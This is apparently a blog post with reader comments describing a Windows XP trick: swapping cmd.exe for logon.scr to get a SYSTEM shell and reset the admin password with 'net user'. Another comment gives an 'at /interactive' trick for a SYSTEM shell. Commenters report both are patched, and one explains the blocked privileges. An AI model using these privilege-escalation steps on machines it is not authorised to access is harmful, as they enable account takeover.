Reset the Windows XP Admin Password
Either run cmd from a limited account, or get into Recovery mode using the installation CD. Then type the following:
cd c:\windows\system32
mkdir backup
copy logon.scr backup
copy cmd.exe backup
del logon.scr
ren cmd.exe logon.scr
After these commands, the next time the screensaver kicks in you can use the following command to reset the admin password.
net user <admin account> new-password
Remember to reverse what you did up there after reseting the password. You can do this by running:
cd c:\windows\system32
ren logon.scr cmd.exe
copy backup\logon.scr .
del backup\*
rd backup
</admin>
Has anyone already tried this?
It looks very easy … maybe a little to easy?
A while ago I lost my XP password and it took me a lot of efforts to reset it.
why not just use the Offline NT Password & Registry Editor: http://home.eunet.no/pnordahl/ntpasswd/
The LOGON.SCR trick does not work w/ current (all?) WXP installations on several fronts.
1) If you can replace logon.scr with cmd.exe, “Windows File Protection” (WFP) will undo it. So you’d have to be able to disable that first OR change the registry value for SCRNSAVE.EXE in [HKEY_USERS\S-1-5-18\Control Panel\Desktop] from logon.scr to cmd.exe
2) Assuming you get cmd.exe in as the screen saver for SYSTEM and wait the 10 +/- minutes, a CMD box will pop up as noted under the user SYSTEM.
3) You try to do a NET USER Administrator and you get “System error 5 has occurred. Access is denied” — how can this be? Isn’t SYSTEM all powerful?
4) SYSTEM is all powerful but Microsoft fixed this back door by removing almost all of SYSTEM’s privs. Running a “whoami /user /groups /priv” for a normal SYSTEM session (AT hh:mm /INTERACTIVE cmd) gives:
[User] = “NT AUTHORITY\SYSTEM”
[Group 1] = “BUILTIN\Administrators”
[Group 2] = “Everyone”
[Group 3] = “NT AUTHORITY\Authenticated Users”
(X) SeTcbPrivilege = Act as part of the operating system
(O) SeCreateTokenPrivilege = Create a token object
(O) SeTakeOwnershipPrivilege = Take ownership of files or other objects
(X) SeCreatePagefilePrivilege = Create a pagefile
(X) SeLockMemoryPrivilege = Lock pages in memory
(O) SeAssignPrimaryTokenPrivilege = Replace a process level token
(O) SeIncreaseQuotaPrivilege = Adjust memory quotas for a process
(X) SeIncreaseBasePriorityPrivilege = Increase scheduling priority
(X) SeCreatePermanentPrivilege = Create permanent shared objects
(X) SeDebugPrivilege = Debug programs
(X) SeAuditPrivilege = Generate security audits
(O) SeSecurityPrivilege = Manage auditing and security log
(O) SeSystemEnvironmentPrivilege = Modify firmware environment values
(X) SeChangeNotifyPrivilege = Bypass traverse checking
(O) SeBackupPrivilege = Back up files and directories
(O) SeRestorePrivilege = Restore files and directories
(O) SeShutdownPrivilege = Shut down the system
(X) SeLoadDriverPrivilege = Load and unload device drivers
(X) SeProfileSingleProcessPrivilege = Profile single process
(X) SeSystemtimePrivilege = Change the system time
(X) SeUndockPrivilege = Remove computer from docking station
(O) SeManageVolumePrivilege = Perform volume maintenance tasks
(X) SeImpersonatePrivilege = Impersonate a client after authentication
(X) SeCreateGlobalPrivilege = Create global objects
But running the same command from the LOGON.SCR replacement instance of CMD.EXE gives:
[User] = “NT AUTHORITY\SYSTEM”
[Group 1] = “BUILTIN\Administrators”
[Group 2] = “Everyone”
[Group 3] = “NT AUTHORITY\Authenticated Users”
(X) SeChangeNotifyPrivilege = Bypass traverse checking
That’s why this doesn’t work.
Rick Valstar
Star Consulting
r + last name + at + gmail + dot + com
1. press “start”
2. run cmd
3. run at HH:MM /interactive “cmd.exe” (time HH:MM+1M)
4. press CTRL+ALT+DEL and disable explorer.exe (end process)
5.in new black window run explorer
After these commands starts SYSTEM account and make your new admin acount
enjoy!!!!!!
exploit is patched. no longer working
doesn’t work
NOn sence and disgusting commands